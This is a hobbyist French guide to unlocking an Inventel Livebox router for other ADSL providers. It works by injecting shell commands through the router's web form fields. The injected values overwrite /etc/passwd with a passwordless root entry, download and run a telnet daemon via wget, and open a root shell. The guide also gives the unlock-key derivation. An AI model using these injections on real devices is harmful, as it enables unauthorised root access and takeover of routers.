Voici mon expérience du débridage de la Livebox standard Inventel.
Nécessaire:
1. Windows XP Pro ou Windows 2000 Pro ou l'un des Windows Server; à défaut, l'utilisateur devra installer un serveur FTP tierce;
2. la version 5.03.03-fr du firmware;
3. un câble ethernet de liaison entre l'ordi et la box.
Les étapes:
1. Installer le serveur FTP
Dans Windows XP Pro, il faut installer les composants IIS, si ce n'est déjà fait, et cocher la case Serveur FTP. Une fois la procédure d'installation achevée, cliquez-droit sur l'icône Poste de travail, puis menu Gérer. Développez le noeud Services Internet (IIS), puis le noeud Site FTP. Vérifiez que le sous-noeud Site FTP par défaut est démarré. Sinon, cliquez-droit et choisissez Démarrer. Toujours sur le même noeud, cliquez-droit sur Propriétés, puis choisissez l'onglet Comptes de sécurité. Cochez la case Autoriser les connexions anonymes et les cases N'autoriser que les connexions anonymes et Autoriser la vérification de mot de passe par IIS. Validez en cliquant sur le bouton OK.
2. Télécharger le programme utelnetd
Cliquez sur le lien
http://www.agp.dsl.pipex.com/files/utelnetd et enregistrez-le dans le répertoire par défaut du serveur FTP, à savoir C:\inetpub\ftproot, en le renommant u tout court (containte pour la suite des opérations).
Pour la suite des opérations, il est impératif de se déconnecter de l'ADSL étant donné qu'il va falloir downgrader le firmware. Le mieux est de débrancher le câble ADSL.
3.Firmware INVENTEL version : v5.01.7-mobistar-be (voir sur le cd off)ok
Si la version firmware de votre livebox est supérieure ou égale à v5.05.xx, il faut absolument la downgrader en une version inférieure (5.03.3 par exemple pour avoir le voip) sinon il n'est pas possible d'utiliser le backdoor du serveur Web de la livebox, une technique qui consiste à passer des commandes via certaines zones de saisie sur les pages HTML. Ce firmware est disponible sur le CD 6.7.1.a. Pour la procédure, visitez le lien
http://www.bichofeo.com/7.htm et téléchargez le fichier rescueinventel.zip qui contient le programme RGWRepair.exe (non présent sur le CD), lequel permet de reflasher la livebox, même celles qui sont tombées en rade (suite à une interruption de flashage, par ex.). Suivez scrupuleusement la procédure, c'est sans risque et réitérable à volonté.
Restez déconnecté de l'ADSL sinon la livebox risque de se mettre à jour automatiquement.
4. Installation du serveur telnet
Il est impératif de changer les adresses IP de la livebox et de l'ordinateur. La raison est que la zone de saisie utilisée accepte un nombre limité de caractères et que toute chaîne trop longue sera tronquée. Pour la livebox, allez dans Configuration->Avancée->Réseau. Changez toutes les adresses (excepté le masque de sous-réseau) pour qu'elles commencent par 10.0.0. L'adresse IP LAN sera donc 10.0.0.1. Décochez la case Activation du serveur DHCP. Cliquez sur Soumettre puis sur Appliquer maintenant la configuration. La box redémarre.
Sous XP, cliquez sur Démarrer->Connexions->Afficher toutes les connexions. Sur l'icône Connexion au réseau local, cliquez-droit puis Propriétés. Dans la liste des éléments, double-cliquez sur Protocole Internet (TCP/IP). Choisissez Utiliser l'adresse IP suivante. Entrez les paramètres suivants:
Adresse IP: 10.0.0.2
Masque: 255.255.255.0
Passerelle: 10.0.0.1
Validez en cliquant sur OK. Il va falloir éventuellement rebooter l'ordinateur.
Il faut maintenant, sur la livebox, suivre la procédure décrite sur le lien
http://www.agp.dsl.pipex.com/command_prompt1.html, dont voici une adaptation française:
- Dans Mes services->Internet, dans Identifiant de connection, tapez:
;echo root::0:0:root:/root:/bin/sh>/etc/passwd
(le point-virgule en tête indique au serveur Web qu'il s'agit d'une commande)
puis cliquez sur Valider.
- Remettez votre identifiant puis validez de nouveau.
- Dans Configuration->Advancée->Sans fil, changez l'ESSID 802.11g en:
;cd /etc;wget
ftp://10.0.0.2/u
Cliquez sur Soumettre, puis sur Appliquer maintenant la configuration. La box redémarre.
- Toujours dans Configuration->Advancée->Sans fil, changez l'ESSID 802.11g en:
;chmod 777 /etc/u
Cliquez sur Soumettre, puis sur Appliquer maintenant la configuration. La box redémarre.
- Toujours dans Configuration->Advancée->Sans fil, changez l'ESSID 802.11g en:
;/etc/u -p 23 -l /bin/sh -d
Cliquez sur Soumettre, puis sur Appliquer maintenant la configuration. La box redémarre.
- Sous XP, ouvrez une fenêtre DOS (Démarrer->Exécuter... puis tapez cmd puis bouton OK). Dans la fenêtre, tapez telnet 10.0.0.1, vous êtes maintenant dans le shell de la livebox.
6. Récupération de la clé de débridage
Tapez (dans le shell): redboot_fconfig_get --parameter h235_key /dev/mtd4
Une clé de 16 caractères est affichée. Cliquez sur le lien
http://www.agp.dsl.pipex.com/h235tounlock.html. Une fenêtre de saisie apparaît. Entrez la précédente clé puis cliquez sur OK. Vous obtenez la clé de débridage. Recopiez-la pour vous en souvenir au cas où.
L'algorithme est simple et consiste en une permutation des caractères. Si le lien ne marche plus, vous pouvez le faire à la main.
clé[ 0] = h235_key[9];
clé[1] = h235_key[4];
clé[2] = h235_key[1];
clé[3] = h235_key[12];
clé[4] = h235_key[14];
clé[5] = h235_key[5];
clé[6] = h235_key[13];
clé[7] = h235_key[6];
clé[8] = h235_key[15];
clé[9] = h235_key[3];
clé[10] = h235_key[8];
clé[11] = h235_key[0];
clé[12] = h235_key[7];
clé[13] = h235_key[10];
clé[14] = h235_key[2];
clé[15] = h235_key[11];
7. Débrigade
Dans l'URL de votre navigateur, tapez: http: //10.0.0.1/brdgoff.html
Une page web pour la saisie de la clé de débridage apparaît. Entrez votre clé puis cliquez sur Soumettre. Une nouvelle page s'affiche avec le message: Votre passerelle a été débridée avec succès.
8. Restauration
Remettez vos adresses réseau antérieures. Reconnectez l'ADSL.
J'ai pu tester une connexion sur Club-Internet non dégroupée avec succès. La page Configuration->Advancée->ADSL présente maintenant de nouvelles options (Protocole pour Internet, Encapsulation, Paramètres ATM) qu'il faut régler en conséquence.
Mais l'expérience ne s'arrête pas là. Au bout de quelques secondes de connexion, les leds de la livebox se sont affolées, puis plus rien, pas de réponse. J'ai dû la débrancher/rebrancher. Toujours rien, bloqué sur une led. Il m'a fallu la reflasher. A la 3eme fois, j'ai laissé faire, le temps de chercher dans le manuel du CD que ce signifiait ce jeu de clignetements. Rien trouvé. (En fait, cela n'est expliqué que sur le site d'Orange). Elle était passée en procédure de mise à jour automatique, et ce, même en étant connecté à Club-Internet ! (Je suis maintenant en v5.05.5-fr).
Deux conclusions s'imposent:
- un reflashage n'annule pas un débrigade;
- la mise à jour automatique est indépendante d'une connexion Wanadoo.
VoIP:
Cette fonction est inutilisable car il n'y a aucune option de paramétrage. Le fait de cliquer sur le bouton Accéder fait apparaître une page web Orange. De plus, chez Club-Internet par ex., le protocole utilisé est MGCP au lieu de SIP.
et voila la livebox de mobistar fonctionne pout tout les providers
Protocole pour Internet PPPoA (PPP over ATM)
PPPoE (PPP over Ethernet)
Bridge
DHCP (dhcp client + nat)
IP Routed (IP over ATM)
Aucun (Internet désactivé)
Encapsulation LLC-Mux
VC-Mux
Paramètres ATM VP VC
Allez, bon débridage !!!